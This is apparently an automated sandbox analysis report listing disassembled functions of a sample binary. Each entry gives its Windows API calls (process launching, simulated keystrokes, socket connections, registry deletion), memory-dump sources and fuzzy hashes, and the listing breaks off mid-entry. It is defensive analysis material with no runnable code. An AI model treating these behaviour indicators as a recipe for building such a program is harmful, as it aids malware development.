Instruction Fuzzy Hash: 9B71BF34601604EFDB21AF54CC95FBF7BA9EF09700F14486EE941973A2C739A891DB98

Function 0047F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0047F448
_memset.LIBCMT ref: 0047F511
ShellExecuteExW.SHELL32(?), ref: 0047F556

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9

GetProcessId.KERNEL32(00000000), ref: 0047F5CD
CloseHandle.KERNEL32(00000000), ref: 0047F5FC

Strings

@, xrefs: 0047F525

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 65c6d4541a5957c05215061cc8cd0f59e5773d27fbd8cd7ace82404b80ebb491
Instruction ID: 5c1dd39b7f321ddcc7bcc10d078eb251a602d9f768a890d439a18523313ae713
Opcode Fuzzy Hash: 65c6d4541a5957c05215061cc8cd0f59e5773d27fbd8cd7ace82404b80ebb491
Instruction Fuzzy Hash: 3B61B1B1A006189FCB04EF55C48099EB7F5FF48314F14846EE819BB392CB38AD45CB88

Function 00460F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00460F8C
GetKeyboardState.USER32(?), ref: 00460FA1
SetKeyboardState.USER32(?), ref: 00461002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
Instruction ID: d8e1dc28bdc088eb6cbc7413f3b60f262c6bc769533ec748a7a92d83500406ea
Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
Instruction Fuzzy Hash: 5F51D1A05046D53DFB3642348C15BBBBEA95B06304F0C898EE1D4959E3E2DDDCC8D75A

Function 00460D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00460DA5
GetKeyboardState.USER32(?), ref: 00460DBA
SetKeyboardState.USER32(?), ref: 00460E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
Instruction ID: 69172e86244207f9b898dfa665998bef84c2b13c00b7e8d8db4e4b2c62b94f0a
Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
Instruction Fuzzy Hash: 035136A05447D53DFB368334CC41B7B7FA95B06300F08898EE1D4569C2E39AAC88D35A

Function 00B97B9C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00B98311,?,00000000,?,00000000,00000000), ref: 00B97BDE
__fassign.LIBCMT ref: 00B97C59
__fassign.LIBCMT ref: 00B97C74
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00B97C9A
WriteFile.KERNEL32(?,?,00000000,00B98311,00000000,?,?,?,?,?,?,?,?,?,00B98311,?), ref: 00B97CB9
WriteFile.KERNEL32(?,?,00000001,00B98311,00000000,?,?,?,?,?,?,?,?,?,00B98311,?), ref: 00B97CF2

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: a5a84b8d3a607029adc63176336c7a46ea7c24ecd790dbf88ae79d7558e317c6
Instruction ID: 29334b196129ac4841ba89bb6be03399c190fb6dcde1ac62042bc29ef21f2526
Opcode Fuzzy Hash: a5a84b8d3a607029adc63176336c7a46ea7c24ecd790dbf88ae79d7558e317c6
Instruction Fuzzy Hash: 9F51A6B1A542499FCF10CFA8DC85AEEBBF4EF09300F1445BAE955E7291DB709941CBA0

Function 004655FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0046560A
_wcsncpy.LIBCMT ref: 0046563F
_wcsncpy.LIBCMT ref: 00465671
_wcsncpy.LIBCMT ref: 004656A4
_wcsncpy.LIBCMT ref: 004656E6
_wcsncpy.LIBCMT ref: 00465720
_wcsncpy.LIBCMT ref: 0046574F

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
Instruction ID: 7a6b7d837badcf90248cfae842bd011e2e93fbf2a36f5ea1b26b70f3dca78a8a
Opcode Fuzzy Hash: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
Instruction Fuzzy Hash: 5541B565D1022476CB11EBB59846ACFB7B8AF05311F90485BF508E3221FA78E285C7AE

Function 0045D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045D60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045D61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045D69D

Strings

,,I, xrefs: 0045D578
DllGetClassObject, xrefs: 0045D610

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: ,,I$DllGetClassObject
API String ID: 753597075-1683996018
Opcode ID: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
Instruction ID: 3f0141d9bf832a65cf1f2fff52dd88c9064c6a7eaa25d9247cf5eee920db5d90
Opcode Fuzzy Hash: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
Instruction Fuzzy Hash: 1B41A4B1900204EFDF24DF14C884A9A7BA9EF44315F1581AEEC09DF206D7B4DD49CBA8

Function 00487291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004872AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
IsMenu.USER32(?), ref: 00487369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
DrawMenuBar.USER32 ref: 004873C4

Strings

0, xrefs: 0048729E

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
Instruction ID: fcd3fc1e0e94e91f8146e9bbeff2772ee04bbaba0065c2a20de26dc7b403efd4
Opcode Fuzzy Hash: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
Instruction Fuzzy Hash: AA411675A04208AFDB20EF50D894A9EBBB4FB04350F24882AFD15A7360D734ED64EB65

Function 00480FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
FreeLibrary.KERNEL32(00000000), ref: 004810B5

Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
Instruction ID: 3e22e70b6f2616eb7250a30d7d8a48524582d6e50c9a57dc89dcd50e66651605
Opcode Fuzzy Hash: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
Instruction Fuzzy Hash: E2311D71900109BFDB15AF90DC89EFFB7BCEF09300F10096BE501E2251D6745E8A9BA9

Function 004862CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
GetWindowLongW.USER32(00D655A0,000000F0), ref: 0048631F
GetWindowLongW.USER32(00D655A0,000000F0), ref: 00486354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
Instruction ID: de0077e50bd3e6fac1d65856e76e1ec94ed34838b8122e9b1a950ed70c11c10c
Opcode Fuzzy Hash: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
Instruction Fuzzy Hash: 2B3125306001509FDB61EF18EC84F6E37E1FB4A714F1A05B9F9009F2B1CB75A8849B59

Function 00476173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000), ref: 00477DB6

socket.WSOCK32(00000002,00000001,00000006), ref: 004761C6
WSAGetLastError.WSOCK32(00000000), ref: 004761D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
connect.WSOCK32(00000000,?,00000010), ref: 00476217
WSAGetLastError.WSOCK32 ref: 00476221
closesocket.WSOCK32(00000000), ref: 0047624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
Instruction ID: 9a8db824e4f103e753759010288aef610dd859574b1bdde890bb221953e34ba6
Opcode Fuzzy Hash: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
Instruction Fuzzy Hash: E131C671600104ABDF10BF64CC85BBE77ADEB45714F05846EFD09A7292DB78AC088B65

Function 004875CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00487632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0048763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0048764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00487659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00487665

Strings

Msctls_Progress32, xrefs: 00487603

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
Instruction ID: 4837c572468b061b20148283283cd62aa6e96b5405c17b40ad05b898919227a4
Opcode Fuzzy Hash: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
Instruction Fuzzy Hash: B711D3B1110119BFEF109F64CC85EEB7F5DEF083A8F114115BA04A21A0D776AC21DBA8

Function 00B93216 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B931DA: _free.LIBCMT ref: 00B93203

_free.LIBCMT ref: 00B93264

Part of subcall function 00B92096: HeapFree.KERNEL32(00000000,00000000,?,00B93208,?,00000000,?,00000000,?,00B9322F,?,00000007,?,?,00B92697,?), ref: 00B920AC
Part of subcall function 00B92096: GetLastError.KERNEL32(?,?,00B93208,?,00000000,?,00000000,?,00B9322F,?,00000007,?,?,00B92697,?,?), ref: 00B920BE

_free.LIBCMT ref: 00B9326F
_free.LIBCMT ref: 00B9327A
_free.LIBCMT ref: 00B932CE
_free.LIBCMT ref: 00B932D9
_free.LIBCMT ref: 00B932E4
_free.LIBCMT ref: 00B932EF

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
Instruction ID: fb60e2604349701042cb51899dc5ae44fd5e25cd005088b866d43340eed31fc9
Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
Instruction Fuzzy Hash: 8D111F72A40B14BADD30FBB0CC07FCB77DCAF05B40F404875BAAE76062DA65B6048661

Function 0042406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
GetProcAddress.KERNEL32(00000000), ref: 0042408C
EncodePointer.KERNEL32(00000000), ref: 00424097
DecodePointer.KERNEL32(00423F85), ref: 004240B2

Strings

combase.dll, xrefs: 00424080
RoUninitialize, xrefs: 00424074

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C

Function 00B944E9 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00B9473A,?,?,00000000), ref: 00B94543
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00B9473A,?,?,00000000,?,?,?), ref: 00B945C9
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B946C3
__freea.LIBCMT ref: 00B946D0

Part of subcall function 00B932FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00B9332C

__freea.LIBCMT ref: 00B946D9
__freea.LIBCMT ref: 00B946FE

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 4b1ef4392fca1989b850421b5eb2eefc67c3ba62f7f8313d8990412a061d611c
Instruction ID: a2411b458c2717b84d453d29da90d756c926eead731c03a7421c7d95efc8f2dd
Opcode Fuzzy Hash: 4b1ef4392fca1989b850421b5eb2eefc67c3ba62f7f8313d8990412a061d611c
Instruction Fuzzy Hash: 7951DEB2600216AFDF258FA4CC81EAB7BE9EB46750B1542F9F804D7190EB74DC52D6A0

Function 004664B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0046660B
_memmove.LIBCMT ref: 00466546

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

_memmove.LIBCMT ref: 004665B9
_memmove.LIBCMT ref: 004666A0
_memmove.LIBCMT ref: 004666B9
_memmove.LIBCMT ref: 004666D5

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: b5667a58d8b30e36736d260972df2e3e7fbb4f6b60a61dc2730759adb4cd8b3c
Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
Opcode Fuzzy Hash: b5667a58d8b30e36736d260972df2e3e7fbb4f6b60a61dc2730759adb4cd8b3c
Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A

Function 004801E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
